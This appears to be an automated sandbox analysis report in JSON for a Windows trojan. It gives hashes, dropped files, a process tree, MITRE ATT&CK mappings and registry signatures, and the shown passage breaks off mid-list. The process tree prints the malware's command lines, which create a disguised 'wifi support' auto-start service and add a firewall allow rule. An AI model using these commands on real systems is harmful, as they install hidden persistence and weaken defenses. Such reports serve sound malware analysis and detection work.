{"size": 11644647, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48", "sha256": "189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 3, "total_processes": 9, "total_signatures": 201, "extracted_files": [{"name": "egzkrznd.exe", "file_path": "%TEMP%\\egzkrznd.exe", "file_size": 5242368, "sha256": "92034b9af871f36980d0fcbed8e22333e42370439a85b83d43e6dd6ab7851c85", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 4000)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "egzkrznd.exe.67EE4A6E.bin", "file_size": 15638016, "sha256": "c5cd94d7151e933c9433acdb3820626c1d7febe31689ce002bd879fba81d90af", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005872", "name": "189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe", "normalized_path": "C:\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe", "sha256": "189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48"}, {"uid": "00000000-00004004", "parentuid": "00000000-00005872", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\zvdnuoqu\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004000", "parentuid": "00000000-00005872", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\egzkrznd.exe\" %WINDIR%\\system32\\zvdnuoqu\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006044", "parentuid": "00000000-00005872", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create zvdnuoqu binPath= \"%WINDIR%\\system32\\zvdnuoqu\\egzkrznd.exe /d\\\"C:\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004236", "parentuid": "00000000-00005872", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description zvdnuoqu \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004152", "parentuid": "00000000-00005872", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start zvdnuoqu", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00003360", "parentuid": "00000000-00005872", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00001396", "name": "egzkrznd.exe", "normalized_path": "%WINDIR%\\system32\\zvdnuoqu\\egzkrznd.exe", "command_line": "/d\"C:\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\"", "sha256": "c5cd94d7151e933c9433acdb3820626c1d7febe31689ce002bd879fba81d90af"}, {"uid": "00000000-00003900", "parentuid": "00000000-00001396", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 19}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\egzkrznd.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n 